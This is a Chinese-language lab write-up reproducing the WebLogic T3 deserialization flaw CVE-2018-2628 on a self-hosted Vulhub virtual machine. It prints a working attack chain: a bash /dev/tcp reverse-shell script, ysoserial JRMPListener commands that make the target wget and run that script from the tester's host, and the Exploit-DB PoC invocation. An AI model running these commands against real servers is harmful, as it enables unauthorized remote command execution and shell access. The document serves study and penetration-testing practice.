Vulnhub-Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628）

郑重声明：所用漏洞环境为自建虚拟机vulnhub靶机环境，仅供本人学习使用。

漏洞简述

Oracle 2018年4月补丁中，修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞（CVE-2018-2628），该漏洞通过t3协议触发，可导致未授权的用户在远程服务器执行任意命令。

影响版本：10.3.6.0、12.1.3.0、12.2.1.2、12.2.1.3

准备环境

测试机IP：192.168.79.129

靶机IP：192.168.79.131

1. 启动Vulnhub靶机环境：

2. 验证靶机应用启用成功：

3. 通过nmap扫描确认Weblogic版本

漏洞复现

POC 引用：https://www.exploit-db.com/exploits/44553

1. 准备 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

2. 准备反弹Shell文件shell.sh

bash -i >& /dev/tcp/192.168.79.129/4444 0>&1

3. 启JRMPListener和执行的命令

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'wget 192.168.79.129/shell.sh'

4.启http server

5. 执行POC脚本

python exploit.py 192.168.79.131 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.79.129 1099 JRMPClient

靶机已下载了反弹Shell文件

6. 使用NC侦听反弹端口

7. 重复之前的步骤

a. 准备JRMPListener和执行的命令，来执行反弹Shell文件

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'bash shell.sh'

b. 执行POC脚本

得到反弹Shell

关闭环境